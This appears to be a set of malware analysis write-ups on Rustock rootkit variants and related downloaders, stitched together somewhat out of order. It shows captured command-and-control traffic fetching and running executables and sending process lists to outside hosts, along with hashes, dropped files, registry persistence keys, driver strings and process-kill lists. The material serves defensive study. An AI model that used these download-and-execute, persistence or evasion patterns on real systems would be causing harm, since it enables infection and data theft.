During the analysis we noticed that the malware used a particular string for the User Agent for communicate with a specific domain: Gootkit ldr 1.0 … is this a new name for a new Malware Kit ???

The .EXE file after its execution, injected code into services.exe and then started to send various GET queries to a specific domain:

1

195.2.253.246 (catjepzcft.com)

Network traffic:

1
2
3
4
5
6
7
8
9
10
11

GET /progs/ptpqq/pmzznaann.php?adv=advxxx HTTP/1.1
Host: catjepzcft.com
 
GET /progs/ptpqq/mmjjwjxt.php HTTP/1.1
Host: catjepzcft.com
 
GET /progs/ptpqq/ebbxlllly.php HTTP/1.1
Host: catjepzcft.com
 
GET /progs/ptpqq/spcmmzmnak.php HTTP/1.1
Host: catjepzcft.com

All of the above *.php files redirect to PE (Portable Executable) files that are all downloaded in TEMP folder and are then executed hidden.

Rustock spam bots have C&C (Command and Control) domain names that are hardcoded inside the malware code, this technique allows the bot’s authors to change the controlled hosts dinamycally. This Rustock variant has started various requests with these domains:

1
2
3

yopilazankaza.net
grezasadaf.info
mail.grezasadaf.info

After, we noticed the malware sent some encrypted traffic to this IP:

1

74.52.83.83 (user.happyhost.org)

We can see from the traffic below that the malware sent some info to the malicious domain, and our Hardware ID to identify our computer:

1
2

GET /progs/ptpqq/pmmmaana.php?adv=advxxx&code1=LSI0&code2=0809&id=-[HD_ID]&p=1 HTTP/1.1
Host: catjepzcft.com

Next, it started traffic with another domain:

1
2
3

ctfmon.info
110.60.233.72.static.reverse.ltdomains.com
72.233.60.110

Network traffic:

1
2

GET /cd/cd.php?id=5V9B6019C6A1FA0&ver=nz0 HTTP/1.1
Host: ctfmon.info

And at this point, the malware started to send data to a new IP:

1

92.62.101.27 (ds27.esthost.eu)

Network traffic:

1
2
3

GET /d3n2829230.dat HTTP/1.0
User-Agent: Gootkit ldr 1.0
Host: 92.62.101.27:5191

Note how is named the User Agent: Gootkit ldr 1.0.
It may be the name of a NEW malware kit and ldr should stand for loader.

New traffic:

1
2
3
4
5

GET /xxxxxxxxxxxxx HTTP/1.1
Host: damqrgldev.net
 
GET /xxxxxxxxxxxxx HTTP/1.1
Host: damqrgldev.net

The malware downloaded various malicious files (again) in TEMP Folder, and executed all of them… At this point, the malware started to send a lot of encrypted data to a domain (previously named):

1

92.62.101.27 (ds27.esthost.eu)

Network traffic:

Packets : 505
Data Size : 329.768 Bytes
Total Size : 350.040 Bytes

And now started a heavy SPAM activity… the malware started to send various domain requests to a lot of email servers:

And then the spambot started to send a high amount of spam messages… the SPAM campaign is now more active than ever!!!

Now lets see what files were created by this Rustock variant:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

C:\WINDOWS\system32\drivers\50cb8405.sys => DRIVER OF THE ROOTKIT
C:\mtoaphpo.exe
C:\lcrywx.exe
C:\shcu.exe
C:\1630016.bat
C:\paohiqlm.exe
C:\-[HARDWARE_ID]
C:\WINDOWS\system32\drivers\lmo08ed.sys => ANOTHER DRIVER OF THE ROOTKIT
C:\DOCUME~1\user\LOCALS~1\Temp\2081034192.exe
C:\DOCUME~1\user\LOCALS~1\Temp\2092050032.exe
C:\hhfls.exe
C:\WINDOWS\system32\dllcache\svchost.exe.new
C:\ntgxbfmx.exe
C:\DOCUME~1\user\LOCALS~1\Temp\h531l.exe
C:\adwitwxa.exe
C:\zmuvmq.bat
C:\xuulbic.exe
C:\WINDOWS\system32\crypts.dll
C:\DOCUME~1\user\LOCALS~1\Temp\csrssc.exe
C:\DOCUME~1\user\LOCALS~1\Temp\rip10.exe
C:\DOCUME~1\user\LOCALS~1\Temp\2.exe
C:\DOCUME~1\user\LOCALS~1\Temp\7hjhffd.bat
C:\Program Files\Common Files\imlhy.dll
C:\DOCUME~1\user\LOCALS~1\Temp\g5i8nvt30.exe
C:\DOCUME~1\user\LOCALS~1\Temp\zbqy6cseo.exe
C:\DOCUME~1\user\LOCALS~1\Temp\yb2dpk.exe
C:\DOCUME~1\user\LOCALS~1\Temp\ksjx1r.exe
C:\DOCUME~1\user\LOCALS~1\Temp\y62pk.exe
C:\DOCUME~1\user\LOCALS~1\Temp\phl7u.exe
C:\DOCUME~1\user\LOCALS~1\Temp\x4l7wf4x.exe
C:\DOCUME~1\user\LOCALS~1\Temp\acs2reslt4.exe

Below there are the virus scanner reports of the two rootkit drivers:

Report Generated: 16.3.2009 at 0.25.01 (GMT 1)
File Name: 50cb8405.sys
File Size: 101 KB
MD5 Hash: 3B51541EB5EAE7342A191EF17C8B3D60
SHA1 Hash: 70A7C283EE4DFCE6AF490FB256FF944185238C20
Detection Rate: 3 on 24 (12,5 %)
Status: INFECTED

 

Antivirus Sig version Engine Version Result
a-squared 15/03/2009 4.0.0.32 -
Avira AntiVir 7.1.2.171 8.1.2.12 TR/Rootkit.Gen
Avast 090314-0 4.8.1229 -
AVG 270.11.15/2003 8.0.0.0 -
BitDefender 16/03/2009 7.0.0.2555 Backdoor.Rustock.NFE
ClamAV 15/03/2009 0.93.1.0 -
Comodo 1057 3.8 -
Dr.Web 16/03/2009 5.0 -
Ewido 16/03/2009 4.0.0.2 -
F-PROT 6 20090315 4.4.4.56 -
G DATA 19.3655 2.0.7309.847 -
IkarusT3 14/03/2009 1001044 -
Kaspersky 16/03/2009 8.0.0.357 -
McAfee 15/03/2009 5.1.0.0 -
Malware Hash Registry 16/03/2009 N/A -
NOD32 v3 3937 3.0.677 -
Norman 2009/03/13 5.92.08 -
Panda 07/02/2009 9.5.1.00 -
QuickHeal 14 March, 2009 10.0 -
Solo Antivirus 16/03/2009 8.0 -
Sophos 16/03/2009 4.32.0 -
TrendMicro 895(589500) 1.1-1001 -
VBA32 16/03/2009 3.12.0.300 Malware-Cryptor.Win32.General.3
VirusBuster 10.102.11 1.4.3 -

Report Generated: 16.3.2009 at 0.26.02 (GMT 1)
File Name: lmo08ed.sys
File Size: 21 KB
MD5 Hash: 1614229CC85D2F0DA1668BEC2AA2966E
SHA1 Hash: F2347ABAD8541540040D69DF6EC7F9104B998C74
Detection Rate: 1 on 24 (4,16 %)
Status: INFECTED

 

Antivirus Sig version Engine Version Result
a-squared 15/03/2009 4.0.0.32 -
Avira AntiVir 7.1.2.171 8.1.2.12 -
Avast 090314-0 4.8.1229 -
AVG 270.11.15/2003 8.0.0.0 -
BitDefender 16/03/2009 7.0.0.2555 -
ClamAV 15/03/2009 0.93.1.0 -
Comodo 1057 3.8 -
Dr.Web 16/03/2009 5.0 -
Ewido 16/03/2009 4.0.0.2 -
F-PROT 6 20090315 4.4.4.56 -
G DATA 19.3655 2.0.7309.847 -
IkarusT3 14/03/2009 1001044 -
Kaspersky 16/03/2009 8.0.0.357 -
McAfee 15/03/2009 5.1.0.0 -
Malware Hash Registry 16/03/2009 N/A -
NOD32 v3 3937 3.0.677 -
Norman 2009/03/13 5.92.08 Trojan W32/Rootkit.AJUT
Panda 07/02/2009 9.5.1.00 -
QuickHeal 14 March, 2009 10.0 -
Solo Antivirus 16/03/2009 8.0 -
Sophos 16/03/2009 4.32.0 -
TrendMicro 895(589500) 1.1-1001 -
VBA32 16/03/2009 3.12.0.300 -
VirusBuster 10.102.11 1.4.3 -

The rootkit installs always the 3 (famous) SSDT hooks and this time we can see that it hides also its driver:

Hidden Driver:

Stealth Code:

Kernel Modifications:

And below, there is an HijackThis log:

Running processes:
C:\DOCUME~1\user\LOCALS~1\Temp\csrssc.exe
C:\DOCUME~1\user\LOCALS~1\Temp\ig2wf5bum4.exe
C:\DOCUME~1\user\LOCALS~1\Temp\i10ftqrh0.exe

 

O4 – HKLM\..\Run: [xsigsud7qw7f8rwrt8] C:\DOCUME~1\user\LOCALS~1\Temp\h531l.exe
O4 – HKLM\..\Run: [y0agaspmnmxkw4djb3as16eeuar] C:\DOCUME~1\user\LOCALS~1\Temp\g5i8nvt30.exe
O4 – HKLM\..\Run: [t50zoy0kqddd9qjam7lfo] C:\DOCUME~1\user\LOCALS~1\Temp\f35avpt2j.exe
O4 – HKLM\..\Run: [krae4io3anewkh6n1c32] C:\DOCUME~1\user\LOCALS~1\Temp\go82c4irn.exe
O4 – HKLM\..\Run: [i3ommwe1iq63eplz1l5shm39kd3nr] C:\DOCUME~1\user\LOCALS~1\Temp\ldav9bgf.exe
O4 – HKLM\..\Run: [wlad2loiah66phy9e] C:\DOCUME~1\user\LOCALS~1\Temp\s7rg8a.exe
O4 – HKLM\..\Run: [kq005y3gtd5grvxemgyp77puvoxeh] C:\DOCUME~1\user\LOCALS~1\Temp\ceu9gzw17.exe
O4 – HKLM\..\Run: [y2l3ad3xmfd99c18hrirbgvnztg] C:\DOCUME~1\user\LOCALS~1\Temp\zbqy6cseo.exe
O4 – HKLM\..\Run: [ejk9b1onvd75gfmvp2j] C:\DOCUME~1\user\LOCALS~1\Temp\yb2dpk.exe
O4 – HKLM\..\Run: [bicya6fq4l8rm17m0e3tk] C:\DOCUME~1\user\LOCALS~1\Temp\rh1lty.exe
O4 – HKLM\..\Run: [aotn8li6zj2a9a3pd5nk7y] C:\DOCUME~1\user\LOCALS~1\Temp\p27p2.exe
O4 – HKLM\..\Run: [x4veff6kyajo16mhq18ujw8vj3dpa] C:\DOCUME~1\user\LOCALS~1\Temp\ksjx1r.exe
O4 – HKLM\..\Run: [omxf835aubqqpxvzfdvre094g2m0m] C:\DOCUME~1\user\LOCALS~1\Temp\y62pk.exe
O4 – HKLM\..\Run: [eo8in0uixmmd988l5dtstn0gju] C:\DOCUME~1\user\LOCALS~1\Temp\phl7u.exe
O4 – HKLM\..\Run: [e9vetnuspuff604s9iu4bpt] C:\DOCUME~1\user\LOCALS~1\Temp\x4l7wf4x.exe
O4 – HKLM\..\Run: [urg2avbreylonz] C:\DOCUME~1\user\LOCALS~1\Temp\acs2reslt4.exe
O4 – HKCU\..\Run: [nuj56tlag39hly] C:\DOCUME~1\user\LOCALS~1\Temp\d2q8qn.exe
O4 – HKCU\..\Run: [xjtsi4b3oq3] C:\DOCUME~1\user\LOCALS~1\Temp\pyphk.exe
O4 – HKCU\..\Run: [qcsn79k6rirjgr] C:\DOCUME~1\user\LOCALS~1\Temp\l2jna51.exe
O4 – HKCU\..\Run: [oso3bevvdmzr1] C:\DOCUME~1\user\LOCALS~1\Temp\bvtrncc.exe
O4 – HKCU\..\Run: [ubvttqcqfdt7yxo4gt9opxraitvp] C:\DOCUME~1\user\LOCALS~1\Temp\ig2wf5bum4.exe
O4 – HKCU\..\Run: [qiojoeqys7e1f4kgazo4eycu8] C:\DOCUME~1\user\LOCALS~1\Temp\i10ftqrh0.exe
O7 – HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1
O20 – Winlogon Notify: crypt – C:\WINDOWS\SYSTEM32\crypts.dll

The malware disabled also the regedit.exe, as we can see from this value the malware changed the DWORD of the value named DisableRegedit to 1:

O7 – HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1

1
2
3
4
5
6

C:\-24322245 | 444BCB3A3FCF8389296C49467F27E1D6
C:\psqrhqn.exe | 102FF59F4530E084005A2E04B768E9C1
C:\cvqkuk.exe | 102FF59F4530E084005A2E04B768E9C1
C:\ebafud.exe | 3A13D81D2B0F667BE96AD9567EDAFE0A
C:\nriljal.exe | 5293DB6EC3BB865DA8A2C25FD20897C7
C:\naxv.exe | 252EF354DADF254AF07ECD92AC0A31A8

And was created an interesting file in /system32/drivers/:

1

C:\WINDOWS\system32\drivers\aec.sys.bak

The file named aec.sys is the driver of Microsoft (Microsoft Acoustic Echo Canceller) and the malware seem to have created a backup copy (.bak extension) of it, maybe because later the malware will infect the original .SYS file !

After, it created new files:

1
2
3

%User%\LOCALS~1\Temp\winlogin.exe | 17DC830917EABCF78514F559627102BC
%User%\LOCALS~1\Temp\2322862672.exe | 76DD26BBB2571997E0C0035A35A8F7C0
%User%\LOCALS~1\Temp\csrssc.exe | 76DD26BBB2571997E0C0035A35A8F7C0

Both files, winlogin.exe and csrssc.exe will install code hooks (IAT Modifications) as shown in image below:

And finally we can see that 3 drivers were created in /system32/drivers/ folder:

1
2
3
4
5

C:\WINDOWS\system32\drivers\beep.sys.bak
C:\WINDOWS\system32\drivers\d521de.sys
C:\WINDOWS\system32\drivers\ethqksbi.sys
C:\WINDOWS\system32\drivers\beep.sys
C:\WINDOWS\system32\drivers\aec.sys

Note that the malware has created a copy of the driver beep.sys.bak, and then it infects the original beep.sys with I-Worm/Nuwar.W! We can see that the file size is different from the original size, its now 55 KB. When you try to delete the drivers you always get an error, you cannot modify/change/delete any registry key that is related to the rootkit’s drivers, and you cannot modify/change/delete the 2 .SYS files created by the rootkit. The rootkit also hides some TCP Ports.

Report of the scan of the infected beep.sys:

Report Generated 23.11.2008 at 1.44.14 (GMT 1)
Filename: beep.sys
File size: 55 KB
MD5 Hash: 9ECF2DDC3500B5212DC5DB7E7C17CE3E
SHA1 Hash: 8B17BFC350914EA5F61F6FF9D9BDDECFCAA80A89
CRC32: 3119767162
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found *
Self-Extract Archive: Nothing found
Binder Detector: File is possible binded with malware
Detection Rate: 2 on 24

 

Antivirus Result
a-squared -
Avira AntiVir -
Avast -
AVG Virus identified I-Worm/Nuwar.W
BitDefender Trojan.Peed.Gen
ClamAV -
Comodo -
Dr.Web -
Ewido -
F-PROT 6 -
G DATA -
IkarusT3 -
Kaspersky -
McAfee -
MHR -
NOD32 v3 -
Norman -
Panda -
QuickHeal -
Solo Antivirus -
Sophos -
TrendMicro -
VBA32 -
VirusBuster -

We can extract interesting strings from the infected beep.sys:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

ZwOpenKey
ZwCreateKey
svchost.exe
ZwCreateEvent
TransportAddress
ConnectionContext
C:\progz\NewWork\driver\objfre\i386\driver.pdb
LoadLibraryA
GetProcAddress
SetEvent
Init
CreateThread
SleepEx
d521de
FATAL_UNHANDLED_HARD_ERROR
ntoskrnl.exe
\BaseNamedObjects\5B37FB3B-984D-1E57-FF38-AA681BE5C8D9
\registry\machine\system\CurrentControlSet\Services\%x
\SystemRoot\System32\drivers\%x.sys
\BaseNamedObjects\{60F9FCD0-8DD4-6453-E394-771298D2A471}
services.exe
\registry\machine\system\CurrentControlSet\Enum\Root\LEGACY_%ws
\SystemRoot\System32\ntdll.dll
%ws%ws
\Device\Tcp
svchost.exe
\SystemRoot\Temp\%u.tmp
.log
\registry\machine\system
\Device\Tcp

Again, we see this string:

C:\progz\NewWork\driver\objfre\i386\driver.pdb

That was present in new Rootkit.Rustock.E variants, and we can see the reference to svchost.exe where the malware injects its code. We can see also the reference to d521de that is the other kernel driver that is installed by the rootkit.

Report of the scan of ethqksbi.sys:

Report Generated 24.11.2008 at 2.35.54 (GMT 1)
Filename: ethqksbi.sys
File size: 131 KB
MD5 Hash: BA4423EF27AAA93B35A0AB1ED64F0383
SHA1 Hash: 866652B76C42E94DD38039B48203924A999B01CD
CRC32: 452990838
Application Type: Dinamyc Link Library (DLL) 32bit
Packer detected: Nothing found *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection Rate: 1 on 24

 

Antivirus Result
a-squared -
Avira AntiVir TR/Rootkit.Gen
Avast -
AVG -
BitDefender -
ClamAV -
Comodo -
Dr.Web -
Ewido -
F-PROT 6 -
G DATA -
IkarusT3 -
Kaspersky -
McAfee -
MHR -
NOD32 v3 -
Norman -
Panda -
QuickHeal -
Solo Antivirus -
Sophos -
TrendMicro -
VBA32 -
VirusBuster -

PE Import Tables:

ntoskrnl.exe
+DbgPrint
+ZwRestoreKey
+KeQueryTimeIncrement
+ObReferenceObjectByHandle
+_except_handler3
+ObLogSecurityDescriptor
+ExAllocatePoolWithTag
+wcsncpy
+FsRtlInitializeOplock
+ZwPulseEvent
+KeTickCount
+strncmp
+MmMapLockedPagesSpecifyCache
+KeBugCheckEx
+ExIsResourceAcquiredExclusiveLite
+RtlAddAce
+ZwQueryDefaultUILanguage
+ZwQuerySystemInformation
+ExAllocatePoolWithQuota
+strstr
+ExFreePoolWithTag
+ObfReferenceObject
+RtlAnsiCharToUnicodeChar
+strncpy
+IoGetCurrentProcess

Report of the scan of d521de.sys:

Report Generated 24.11.2008 at 2.35.54 (GMT 1)
Filename: d521de_sys
File size: 98 KB
MD5 Hash: 404032043145EB962E62887ECD065327
SHA1 Hash: F40F270F000709AF807F5155685C29AB333CF882
CRC32: 1053342703
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found [Overlay] *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection Rate: 5 on 24

 

Antivirus Result
a-squared -
Avira AntiVir TR/Rootkit.Gen
Avast Win32:Rootkit-gen [Rtk] (0)
AVG Virus identified I-Worm/Nuwar.W
BitDefender -
ClamAV -
Comodo -
Dr.Web -
Ewido -
F-PROT 6 -
G DATA Win32:Rootkit-gen [Rtk] B
IkarusT3 -
Kaspersky -
McAfee -
MHR -
NOD32 v3 -
Norman -
Panda -
QuickHeal -
Solo Antivirus -
Sophos -
TrendMicro -
VBA32 Malware-Cryptor.Win32.General.3
VirusBuster -

PE Import Tables:

ntoskrnl.exe
+IoDeleteDevice
+KeSetEvent
+KeInitializeMutex
+IoFreeIrp
+IoAllocateIrp
+ObfReferenceObject
+KeInitializeEvent
+IoAttachDevice
+ObfDereferenceObject
+ExFreePoolWithTag
+IoAllocateMdl
+memcpy
+IoFreeWorkItem
+IofCallDriver
+KeWaitForSingleObject
HAL.dll
+ExAcquireFastMutex
+ExReleaseFastMutex

Below there are some images of the infection:

Browser Helper Objects:

Message Hooks:

SSDT Hooks:

Beep.SYS infected and Ntfs.sys Hooks:

Unknown IRP Handler:

Tcpip.sys Hooks:

Stealth Code:

Registry Startup Keys

Other Code Hooks

Regedit is disabled

The file that established connections with the website was named load.exe and below there is the report of the scan:

Report Generated 22.11.2008 at 23.15.36 (GMT 1)
Filename: load.exe
File size: 27 KB
MD5 Hash: 97A860C202A8016E08818F3AA90525B8
SHA1 Hash: CADF466ABD29CD993DD81EC838282589D0077BAC
CRC32: 89416946
Application Type: Executable (EXE) 32bit
Packer detected: Microsoft Visual C++ 6.0
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection Rate: 23 on 23

 

Antivirus Result
a-squared Trojan-Downloader.Agent!IK
Avira AntiVir TR/Dldr.Agent.agl
Avast Win32:Small-JMK [Trj] (0)
AVG Trojan horse Downloader.Zlob.12.R
BitDefender Trojan.Crypt.AI
ClamAV Worm.Socks-11
Comodo TrojWare.Win32.PSW.Agent.NHG
Dr.Web Trojan.PWS.Pace
Ewido Downloader.Agent.llo
F-PROT 6 W32/Socks.A.gen!Eldorado (generic, not disinfectable)
G DATA Trojan-Downloader.Win32.Agent.llo A
IkarusT3 Trojan-Downloader.Agent
Kaspersky Trojan-Downloader.Win32.Agent.llo
McAfee BackDoor-DRW trojan
MHR (Malware Hash Registry) Virus Found – detect rate 75%
NOD32 v3 Win32/PSW.Agent.NHG trojan
Norman Trojan W32/Agent.EXZF ()
QuickHeal TrojanDownloader.Agent.llo
Solo Antivirus Infection TrojanDropper.Win32.Small.Bgx
Sophos Troj/Dloadr-BMT
TrendMicro WORM_SOCKS.BL
VBA32 Trojan-Downloader.Win32.Agent.llo
VirusBuster Trojan.DL.Agent.ETEH

When I executed this load.exe file, a lot of traffic was established with this domain:

1

kolonka17.cn

Internet traffic:

1
2
3

GET /loader/?&v=ver&s=9988 HTTP/1.1
User-Agent: _
Host: kolonka17.cn

With the traffic below, another executable file named win.exe will be downloaded and executed in my system:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

GET /loader/manda.php?id=-695459345&v=ver&s=9988 HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
 
HTTP/1.1 200 OK
Server: Apache/2
Content-length: 29
 
hxxp://kolonka17.cn/win.exe|5
 
GET /win.exe HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf

Next we see new traffic to a new domain, where it sends a lot of encrypted data:

1
2
3
4
5
6
7
8
9
10
11
12

GET /40E8001431303134393536323335383537393339333234386C0000018D66000000007600000642EB00053085858585 HTTP/1.0
Host: 69.147.239.106
 
HTTP/1.0 200 OK
Date: Sat, 22 Nov 2008 09:04:03 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch9
Last-Modified: Sat, 22 Nov 2008 09:04:03 GMT
Cache-Control: no-cache
Content-Length: 107532
Connection: close
Content-Type: application/octet-stream
...

And below there is some interesting traffic:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

GET /loader/manda.php?id=-789987028&l=5&v=ver&s=9988 HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
 
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:06 GMT
Server: Apache/2
Content-Length: 2
 
ok
 
GET /loader/proc_kill HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
 
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:07 GMT
Server: Apache/2
Last-Modified: Wed, 12 Nov 2008 09:23:38 GMT
Content-Length: 185
Content-Type: text/plain
 
regedit.exe
msconfig.exe
taskmgr.exe
reg.exe
taskkill.exe
tskill.exe
tasklist.exe
infium.exe
notepad.exe
explorer.exe
nod32kui.exe
nod32kui.exe
egui.exe
egui.exe
putty.exe

The malware now gets the command to kill a list of processes on my system:

1

GET /loader/proc_kill HTTP/1.1

But the malware will not stop at just killing the processes! The malware will also delete some important executable files of the system, such as:

1

C:\WINDOWS\explorer.exe

In the new traffic below we can see the malware received another command:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

GET /loader/proc_run HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
 
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:14 GMT
Server: Apache/2
Content-Length: 30
Content-Type: text/plain
 
none.exe
taskmon.exe
qip.exe
 
GET /loader/proc_killsize HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
 
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:10 GMT
Server: Apache/2
Content-Length: 40
Content-Type: text/plain
 
tasklis2t.exe
inf3ium.exe
note4pad.exe

And is always related to process killing. After, we sent new traffic to the domain:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

POST /loader/data.php?id=-789987028 HTTP/1.1
Host: kolonka17.cn
Content-Type: application/x-www-form-urlencoded
Content-length: 289
 
proc=[System Process]
smss.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
svchost.exe
spoolsv.exe
explorer.exe
alg.exe
wscntfy.exe
ufo.exe
load.exe
14B.tmp
size=12800
0
0
0
108032
13312
14336
57856
13824
51200
27648
12800
 
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:22 GMT
Content-Length: 0
Content-Type: text/html

We can see the malware has sent some information related to the current running processes of my system !! But note we have also sent the size of each process ! This information can be used by future malware versions, maybe to create some evading-code or to detect certain processes “not much loved” by the malware.

Next we received some traffic in the SMTP (25) port:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

Protocol          : TCP
Local Address     : 64.233.183.27
Local Port        : 25
 
220 mx.google.com ESMTP k5si310246nfh.0
 
Protocol          : TCP
Local Address     : 209.85.135.114
Local Port        : 25
 
220 mx.google.com ESMTP n10si1763302mue.37
 
Protocol          : TCP
Local Address     : 94.100.176.20
Local Port        : 25
 
220 Mail.Ru ESMTP
 
Protocol          : TCP
Local Address     : 216.157.145.27
Local Port        : 25
 
220 mail7.hsphere.cc ESMTP mail7.hsphere.cc; Sat Nov 22 09:20:00 2008

And a new driver is loaded by the malware:

1

C:\WINDOWS\system32\drivers\Winkk44.sys

Report of the scan:

Report Generated 22.11.2008 at 23.32.46 (GMT 1)
Filename: Winkk44.sys
File size: 32 KB
MD5 Hash: 286C4C43EFED1D81C59AA7BC70B83BD8
SHA1 Hash: 4D09AC6BE2808360697E7ECA71BEBF7CADFDE985
CRC32: 2495620378
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found [Overlay] *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection Rate: 7 on 24

 

Antivirus Result
a-squared Trojan-Dropper.Cutwail!IK
Avira AntiVir -
Avast -
AVG Virus found BackDoor.Ntrootkit
BitDefender Trojan.Dropper.Cutwail.D
ClamAV -
Comodo -
Dr.Web -
Ewido -
F-PROT 6 -
G DATA Trojan-Downloader.Win32.Mutant.aim A
IkarusT3 Trojan-Dropper.Cutwail
Kaspersky Trojan-Downloader.Win32.Mutant.aim
McAfee -
MHR (Malware Hash Registry) -
NOD32 v3 -
Norman -
Panda -
QuickHeal -
Solo Antivirus Infection TrojanDownloader.Win32.Mutant.Aim
Sophos -
TrendMicro -
VBA32 -
VirusBuster -

Again a Trojan.Dropper.Cutwail.D !

Below there are some interested strings extracted from Winkk44.sys:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

winlogon.exe
e:\0soft\loader\runtime3\objfre_wxp_x86\i386\runtime3.pdb
EXERESOURCE
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WinCtrl32
Asynchronous
Impersonate
StartShell
DLLName
WLEventStartShell
WinCtrl32.dll
\SystemRoot\system32\WinCtrl32.dll
ImagePath
Start
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\
\DosDevices\Rntm74
\Device\Rntm74
\SystemRoot\system32\drivers\
\FileSystem
Winkk44.sys

As we can see from the image below, this driver is auto-loaded when the Operating System boots in Safe Mode:

During the analysis, were not detected SSDT/Shadow SSDT Hooks, no Stealth Code, I get BSOD when trying to open certain Anti-Rootkit software, the file Winkk44_sys is protected from changing/modification/deletion and also the registry keys are protected from changing/modification/deletion.

Running processes that are visible with taskmanager:

Registry keys used by the malware to startup with Windows:

Service info:

These are the malware traces we can see from an HijackThis log:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

Running processes:
C:\WINDOWS\system32\drivers\ctfmon.exe
%User%\Local Settings\Application Data\spool.exe
%User%\Local Settings\Application Data\spool.exe
%User%\Local Settings\Application Data\spool.exe
 
O2 - BHO: pl - {B200799F-9538-403d-9A6E-36F5942EC540} - C:\WINDOWS\system32\fklame32.dll (file missing)
O4 - HKLM\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe
O4 - HKLM\..\Run: [autoload] %User%\Local Settings\Application Data\spool.exe
O4 - HKCU\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe
O4 - HKCU\..\Run: [autoload] %User%\Local Settings\Application Data\spool.exe
O4 - HKUS\S-1-5-18\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\Run: [autoload] C:\Documents and Settings\LocalService\Local Settings\Application Data\spool.exe (User 'SYSTEM')
O20 - Winlogon Notify: WinCtrl32 - C:\WINDOWS\SYSTEM32\WinCtrl32.dll
O23 - Service: Task Scheduler (Schedule) - Unknown owner - C:\WINDOWS\system32\drivers\ctfmon.exe

Below there is a small summary of the files created by the malware:

1
2
3
4
5
6
7
8

C:\WINDOWS\system32\ctfmon.exe
%User%\Local Settings\Application Data\spool.exe
%User%\ftpdll.dll
C:\WINDOWS\system32\WinCtrl32.dll
C:\WINDOWS\system32\fklame32.dll
C:\WINDOWS\system32\drivers\ctfmon.exe
C:\WINDOWS\system32\drivers\Winkk44.sys
C:\WINDOWS\system32\drivers\555.exe

Analysis Content: Next Generation of Rustock.Rootkit variants ?
Released: 18.11.2008
Author of Analysis: Robert
Contact: robert@novirusthanks.org
Website: http://novirusthanks.org

My friend Steve sent me today a new possible variant of the famous Rustock.Rootkit !

The file I received was named unprotdmp and below there is the report of the scan:

Report Generated 17.11.2008 at 23.05.50 (GMT 1)
Time for scan: 26 seconds
Filename: unprotdmp
File size: 48 KB
MD5 Hash: 4D5F159DFBDEC338F6E8E83BAAA0B26F
SHA1 Hash: 26E87BE9EC0D41965DA6860AE617AF56A449778F
CRC32: 2928629155
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found [Overlay] *
Self-Extract Archive: Nothing found
Binder Detector: File is possible binded with malware
ASCII Strings: View
Detection Rate: 3 on 23

Antivirus Result
a-squared Nothing found!
Avira AntiVir TR/Dropper.Gen
Avast Nothing found!
AVG Nothing found!
BitDefender Nothing found!
ClamAV Nothing found!
Comodo Nothing found!
Dr.Web Nothing found!
Ewido Nothing found!
F-PROT 6 Nothing found!
G DATA Nothing found!
IkarusT3 Nothing found!
Kaspersky Nothing found!
McAfee Nothing found!
NOD32 v3 Nothing found!
Norman Nothing found!
Panda Nothing found!
QuickHeal Nothing found!
Solo Antivirus Nothing found!
Sophos Nothing found!
TrendMicro Nothing found!
VBA32 Malware-Cryptor.Win32.General.3
VirusBuster Nothing found!

We can see a lot of very interesting strings inside the code of the file:

ExAllocatePool
ExFreePool
ZwQuerySystemInformation
ZwOpenKey
ZwCreateKey
%win
svchost.exe
